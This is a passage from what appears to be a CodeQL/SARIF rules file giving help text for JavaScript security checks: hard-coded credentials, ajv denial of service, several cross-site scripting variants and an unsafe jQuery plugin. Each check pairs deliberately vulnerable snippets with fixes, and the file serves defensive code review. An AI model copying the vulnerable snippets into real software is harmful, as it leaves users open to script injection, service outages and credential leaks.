'passwd';\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\nInstead, user name and password can be supplied through the environment variables `username` and `password`, which can be set externally without hard-coding credentials in the source code.\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = process.env.USERNAME;\nlet password = process.env.PASSWORD;\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\n\n## Example\nThe following code example connects to a Postgres database using the `pg` package and hard-codes user name and password:\n\n\n```javascript\nconst pg = require(\"pg\");\n\nconst client = new pg.Client({\n user: \"bob\",\n host: \"database.server.com\",\n database: \"mydb\",\n password: \"correct-horse-battery-staple\",\n port: 3211\n});\nclient.connect();\n\n```\nInstead, user name and password can be supplied through the environment variables `PGUSER` and `PGPASSWORD`, which can be set externally without hard-coding credentials in the source code.\n\n\n## References\n* OWASP: [Use of hard-coded password](https://www.owasp.org/index.php/Use_of_hard-coded_password).\n* Common Weakness Enumeration: [CWE-259](https://cwe.mitre.org/data/definitions/259.html).\n* Common Weakness Enumeration: [CWE-321](https://cwe.mitre.org/data/definitions/321.html).\n* Common Weakness Enumeration: [CWE-798](https://cwe.mitre.org/data/definitions/798.html).\n", - "markdown" : "# Hard-coded credentials\nIncluding unencrypted hard-coded authentication credentials in source code is dangerous because the credentials may be easily discovered. For example, the code may be open source, or it may be leaked or accidentally revealed, making the credentials visible to an attacker. This, in turn, might enable them to gain unauthorized access, or to obtain privileged information.\n\n\n## Recommendation\nRemove hard-coded credentials, such as user names, passwords and certificates, from source code. Instead, place them in configuration files, environment variables or other data stores if necessary. If possible, store configuration files including credential data separately from the source code, in a secure location with restricted access.\n\n\n## Example\nThe following code example connects to an HTTP request using an hard-codes authentication header:\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = 'user';\nlet password = 'passwd';\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\nInstead, user name and password can be supplied through the environment variables `username` and `password`, which can be set externally without hard-coding credentials in the source code.\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = process.env.USERNAME;\nlet password = process.env.PASSWORD;\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\n\n## Example\nThe following code example connects to a Postgres database using the `pg` package and hard-codes user name and password:\n\n\n```javascript\nconst pg = require(\"pg\");\n\nconst client = new pg.Client({\n user: \"bob\",\n host: \"database.server.com\",\n database: \"mydb\",\n password: \"correct-horse-battery-staple\",\n port: 3211\n});\nclient.connect();\n\n```\nInstead, user name and password can be supplied through the environment variables `PGUSER` and `PGPASSWORD`, which can be set externally without hard-coding credentials in the source code.\n\n\n## References\n* OWASP: [Use of hard-coded password](https://www.owasp.org/index.php/Use_of_hard-coded_password).\n* Common Weakness Enumeration: [CWE-259](https://cwe.mitre.org/data/definitions/259.html).\n* Common Weakness Enumeration: [CWE-321](https://cwe.mitre.org/data/definitions/321.html).\n* Common Weakness Enumeration: [CWE-798](https://cwe.mitre.org/data/definitions/798.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-259", "external/cwe/cwe-321", "external/cwe/cwe-798" ], - "description" : "Hard-coding credentials in source code may enable an attacker\n to gain unauthorized access.", - "id" : "js/hardcoded-credentials", - "kind" : "path-problem", - "name" : "Hard-coded credentials", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "9.8" - } - }, { - "id" : "js/resource-exhaustion-from-deep-object-traversal", - "name" : "js/resource-exhaustion-from-deep-object-traversal", - "shortDescription" : { - "text" : "Resources exhaustion from deep object traversal" - }, - "fullDescription" : { - "text" : "Processing user-controlled object hierarchies inefficiently can lead to denial of service." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Resources exhaustion from deep object traversal\nProcessing user-controlled data with a method that allocates excessive amounts of memory can lead to denial of service.\n\nIf the JSON schema validation library `ajv` is configured with `allErrors: true` there is no limit to how many error objects will be allocated. An attacker can exploit this by sending an object that deliberately contains a huge number of errors, and in some cases, with longer and longer error messages. This can cause the service to become unresponsive due to the slow error-checking process.\n\n\n## Recommendation\nDo not use `allErrors: true` in production.\n\n\n## Example\nIn the example below, the user-submitted object `req.body` is validated using `ajv` and `allErrors: true`:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: true });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\nAlthough this ensures that `req.body` conforms to the schema, the validation itself could be vulnerable to a denial-of-service attack. An attacker could send an object containing so many errors that the server runs out of memory.\n\nA solution is to not pass in `allErrors: true`, which means `ajv` will only report the first error, not all of them:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: process.env['REST_DEBUG'] });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\n\n## References\n* Ajv documentation: [security considerations](https://github.com/ajv-validator/ajv/blob/master/docs/security.md#untrusted-schemas)\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", - "markdown" : "# Resources exhaustion from deep object traversal\nProcessing user-controlled data with a method that allocates excessive amounts of memory can lead to denial of service.\n\nIf the JSON schema validation library `ajv` is configured with `allErrors: true` there is no limit to how many error objects will be allocated. An attacker can exploit this by sending an object that deliberately contains a huge number of errors, and in some cases, with longer and longer error messages. This can cause the service to become unresponsive due to the slow error-checking process.\n\n\n## Recommendation\nDo not use `allErrors: true` in production.\n\n\n## Example\nIn the example below, the user-submitted object `req.body` is validated using `ajv` and `allErrors: true`:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: true });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\nAlthough this ensures that `req.body` conforms to the schema, the validation itself could be vulnerable to a denial-of-service attack. An attacker could send an object containing so many errors that the server runs out of memory.\n\nA solution is to not pass in `allErrors: true`, which means `ajv` will only report the first error, not all of them:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: process.env['REST_DEBUG'] });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\n\n## References\n* Ajv documentation: [security considerations](https://github.com/ajv-validator/ajv/blob/master/docs/security.md#untrusted-schemas)\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-400" ], - "description" : "Processing user-controlled object hierarchies inefficiently can lead to denial of service.", - "id" : "js/resource-exhaustion-from-deep-object-traversal", - "kind" : "path-problem", - "name" : "Resources exhaustion from deep object traversal", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/xss-through-dom", - "name" : "js/xss-through-dom", - "shortDescription" : { - "text" : "DOM text reinterpreted as HTML" - }, - "fullDescription" : { - "text" : "Reinterpreting text from the DOM as HTML can lead to a cross-site scripting vulnerability." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# DOM text reinterpreted as HTML\nExtracting text from a DOM node and interpreting it as HTML can lead to a cross-site scripting vulnerability.\n\nA webpage with this vulnerability reads text from the DOM, and afterwards adds the text as HTML to the DOM. Using text from the DOM as HTML effectively unescapes the text, and thereby invalidates any escaping done on the text. If an attacker is able to control the safe sanitized text, then this vulnerability can be exploited to perform a cross-site scripting attack.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing text to the page, or one of the other solutions that are mentioned in the References section below.\n\n\n## Example\nThe following example shows a webpage using a `data-target` attribute to select and manipulate a DOM element using the JQuery library. In the example, the `data-target` attribute is read into the `target` variable, and the `$` function is then supposed to use the `target` variable as a CSS selector to determine which element should be manipulated.\n\n\n```javascript\n$(\"button\").click(function () {\n var target = $(this).attr(\"data-target\");\n $(target).hide();\n});\n\n```\nHowever, if an attacker can control the `data-target` attribute, then the value of `target` can be used to cause the `$` function to execute arbitrary JavaScript.\n\nThe above vulnerability can be fixed by using `$.find` instead of `$`. The `$.find` function will only interpret `target` as a CSS selector and never as HTML, thereby preventing an XSS attack.\n\n\n```javascript\n$(\"button\").click(function () {\n var target = $(this).attr(\"data-target\");\n\t$.find(target).hide();\n});\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# DOM text reinterpreted as HTML\nExtracting text from a DOM node and interpreting it as HTML can lead to a cross-site scripting vulnerability.\n\nA webpage with this vulnerability reads text from the DOM, and afterwards adds the text as HTML to the DOM. Using text from the DOM as HTML effectively unescapes the text, and thereby invalidates any escaping done on the text. If an attacker is able to control the safe sanitized text, then this vulnerability can be exploited to perform a cross-site scripting attack.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing text to the page, or one of the other solutions that are mentioned in the References section below.\n\n\n## Example\nThe following example shows a webpage using a `data-target` attribute to select and manipulate a DOM element using the JQuery library. In the example, the `data-target` attribute is read into the `target` variable, and the `$` function is then supposed to use the `target` variable as a CSS selector to determine which element should be manipulated.\n\n\n```javascript\n$(\"button\").click(function () {\n var target = $(this).attr(\"data-target\");\n $(target).hide();\n});\n\n```\nHowever, if an attacker can control the `data-target` attribute, then the value of `target` can be used to cause the `$` function to execute arbitrary JavaScript.\n\nThe above vulnerability can be fixed by using `$.find` instead of `$`. The `$.find` function will only interpret `target` as a CSS selector and never as HTML, thereby preventing an XSS attack.\n\n\n```javascript\n$(\"button\").click(function () {\n var target = $(this).attr(\"data-target\");\n\t$.find(target).hide();\n});\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Reinterpreting text from the DOM as HTML\n can lead to a cross-site scripting vulnerability.", - "id" : "js/xss-through-dom", - "kind" : "path-problem", - "name" : "DOM text reinterpreted as HTML", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "6.1" - } - }, { - "id" : "js/xss-through-exception", - "name" : "js/xss-through-exception", - "shortDescription" : { - "text" : "Exception text reinterpreted as HTML" - }, - "fullDescription" : { - "text" : "Reinterpreting text from an exception as HTML can lead to a cross-site scripting vulnerability." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Exception text reinterpreted as HTML\nDirectly writing error messages to a webpage without sanitization allows for a cross-site scripting vulnerability if parts of the error message can be influenced by a user.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows an exception being written directly to the document, and this exception can potentially be influenced by the page URL, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n var href = document.location.href,\n deflt = href.substring(href.indexOf(\"default=\")+8);\n \n try {\n var parsed = unknownParseFunction(deflt); \n } catch(e) {\n document.write(\"Had an error: \" + e + \".\");\n }\n}\n\n```\n\n## Example\nThis second example shows an input being validated using the JSON schema validator `ajv`, and in case of an error, the error message is sent directly back in the response.\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet app = express();\nlet ajv = new Ajv();\n\najv.addSchema({type: 'object', additionalProperties: {type: 'number'}}, 'pollData');\n\napp.post('/polldata', (req, res) => {\n if (!ajv.validate('pollData', req.body)) {\n res.send(ajv.errorsText());\n }\n});\n\n```\nThis is unsafe, because the error message can contain parts of the input. For example, the input `{'': 'foo'}` will generate the error `data/ should be number`, causing reflected XSS.\n\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Exception text reinterpreted as HTML\nDirectly writing error messages to a webpage without sanitization allows for a cross-site scripting vulnerability if parts of the error message can be influenced by a user.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows an exception being written directly to the document, and this exception can potentially be influenced by the page URL, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n var href = document.location.href,\n deflt = href.substring(href.indexOf(\"default=\")+8);\n \n try {\n var parsed = unknownParseFunction(deflt); \n } catch(e) {\n document.write(\"Had an error: \" + e + \".\");\n }\n}\n\n```\n\n## Example\nThis second example shows an input being validated using the JSON schema validator `ajv`, and in case of an error, the error message is sent directly back in the response.\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet app = express();\nlet ajv = new Ajv();\n\najv.addSchema({type: 'object', additionalProperties: {type: 'number'}}, 'pollData');\n\napp.post('/polldata', (req, res) => {\n if (!ajv.validate('pollData', req.body)) {\n res.send(ajv.errorsText());\n }\n});\n\n```\nThis is unsafe, because the error message can contain parts of the input. For example, the input `{'': 'foo'}` will generate the error `data/ should be number`, causing reflected XSS.\n\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Reinterpreting text from an exception as HTML\n can lead to a cross-site scripting vulnerability.", - "id" : "js/xss-through-exception", - "kind" : "path-problem", - "name" : "Exception text reinterpreted as HTML", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "6.1" - } - }, { - "id" : "js/unsafe-jquery-plugin", - "name" : "js/unsafe-jquery-plugin", - "shortDescription" : { - "text" : "Unsafe jQuery plugin" - }, - "fullDescription" : { - "text" : "A jQuery plugin that unintentionally constructs HTML from some of its options may be unsafe to use for clients." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Unsafe jQuery plugin\nLibrary plugins, such as those for the jQuery library, are often configurable through options provided by the clients of the plugin. Clients, however, do not know the implementation details of the plugin, so it is important to document the capabilities of each option. The documentation for the plugin options that the client is responsible for sanitizing is of particular importance. Otherwise, the plugin may write user input (for example, a URL query parameter) to a web page without properly sanitizing it first, which allows for a cross-site scripting vulnerability in the client application through dynamic HTML construction.\n\n\n## Recommendation\nDocument all options that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example shows a jQuery plugin that selects a DOM element, and copies its text content to another DOM element. The selection is performed by using the plugin option `sourceSelector` as a CSS selector.\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// BAD may evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery(options.sourceSelector),\n\t text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\nThis is, however, not a safe plugin, since the call to `jQuery` interprets `sourceSelector` as HTML if it is a string that starts with `<`.\n\nInstead of documenting that the client is responsible for sanitizing `sourceSelector`, the plugin can use `jQuery.find` to always interpret `sourceSelector` as a CSS selector:\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// GOOD may not evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery.find(options.sourceSelector),\n\t text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* jQuery: [Plugin creation](https://learn.jquery.com/plugins/basic-plugin-creation/).\n* Bootstrap: [XSS vulnerable bootstrap plugins](https://github.com/twbs/bootstrap/pull/27047).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Unsafe jQuery plugin\nLibrary plugins, such as those for the jQuery library, are often configurable through options provided by the clients of the plugin. Clients, however, do not know the implementation details of the plugin, so it is important to document the capabilities of each option. The documentation for the plugin options that the client is responsible for sanitizing is of particular importance. Otherwise, the plugin may write user input (for example, a URL query parameter) to a web page without properly sanitizing it first, which allows for a cross-site scripting vulnerability in the client application through dynamic HTML construction.\n\n\n## Recommendation\nDocument all options that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example shows a jQuery plugin that selects a DOM element, and copies its text content to another DOM element. The selection is performed by using the plugin option `sourceSelector` as a CSS selector.\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// BAD may evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery(options.sourceSelector),\n\t text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\nThis is, however, not a safe plugin, since the call to `jQuery` interprets `sourceSelector` as HTML if it is a string that starts with `<`.\n\nInstead of documenting that the client is responsible for sanitizing `sourceSelector`, the plugin can use `jQuery.find` to always interpret `sourceSelector` as a CSS selector:\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// GOOD may not evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery.find(options.sourceSelector),\n\t text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* jQuery: [Plugin creation](https://learn.jquery.com/plugins/basic-plugin-creation/).\n* Bootstrap: [XSS vulnerable bootstrap plugins](https://github.com/twbs/bootstrap/pull/27047).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116", "frameworks/jquery" ], - "description" : "A jQuery plugin that unintentionally constructs HTML from some of its options may be unsafe to use for clients.", - "id" : "js/unsafe-jquery-plugin", - "kind" : "path-problem", - "name" : "Unsafe jQuery plugin", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "6.1" - } - }, { - "id" : "js/xss", - "name" : "js/xss", - "shortDescription" : { - "text" : "Client-side cross-site scripting" - }, - "fullDescription" : { - "text" : "Writing user input directly to the DOM allows for a cross-site scripting vulnerability." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Client-side cross-site scripting\nDirectly writing user input (for example, a URL query parameter) to a webpage without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *DOM-based* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows part of the page URL being written directly to the document, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n var href = document.location.href,\n deflt = href.substring(href.indexOf(\"default=\")+8);\n document.write(\"\");\n document.write(\"\");\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Client-side cross-site scripting\nDirectly writing user input (for example, a URL query parameter) to a webpage without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *DOM-based* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows part of the page URL being written directly to the document, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n var href = document.location.href,\n deflt = href.substring(href.indexOf(\"default=\")+8);\n document.write(\"\");\n document.write(\"\");\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Writing user input directly to the DOM allows for\n a cross-site scripting vulnerability.", - "id" : "js/xss", - "kind" : "path-problem", - "name" : "Client-side cross-site scripting", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, { - "id" : "js/reflected-xss", - "name" : "js/reflected-xss", - "shortDescription" : { - "text" : "Reflected cross-site scripting" - }, - "fullDescription" : { - "text" : "Writing user input directly to an HTTP response allows for a cross-site scripting vulnerability." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Reflected cross-site scripting\nDirectly writing user input (for example, an HTTP request parameter) to an HTTP response without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *reflected* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the response, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example code writes part of an HTTP request (which is controlled by the user) directly to the response. This leaves the website vulnerable to cross-site scripting.\n\n\n```javascript\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n if (!isValidUserId(req.params.id))\n // BAD: a request parameter is incorporated without validation into the response\n res.send(\"Unknown user: \" + req.params.id);\n else\n // TODO: do something exciting\n ;\n});\n\n```\nSanitizing the user-controlled data prevents the vulnerability:\n\n\n```javascript\nvar escape = require('escape-html');\n\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n if (!isValidUserId(req.params.id))\n // GOOD: request parameter is sanitized before incorporating it into the response\n res.send(\"Unknown user: \" + escape(req.params.id));\n else\n // TODO: do something exciting\n ;\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Reflected cross-site scripting\nDirectly writing user input (for example, an HTTP request parameter) to an HTTP response without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *reflected* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the response, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example code writes part of an HTTP request (which is controlled by the user) directly to the response. This leaves the website vulnerable to cross-site scripting.\n\n\n```javascript\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n if (!isValidUserId(req.params.id))\n // BAD: a request parameter is incorporated without validation into the response\n res.send(\"Unknown user: \" + req.params.id);\n else\n // TODO: do something exciting\n ;\n});\n\n```\nSanitizing the user-controlled data prevents the vulnerability:\n\n\n```javascript\nvar escape = require('escape-html');\n\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n if (!isValidUserId(req.params.id))\n // GOOD: request parameter is sanitized before incorporating it into the response\n 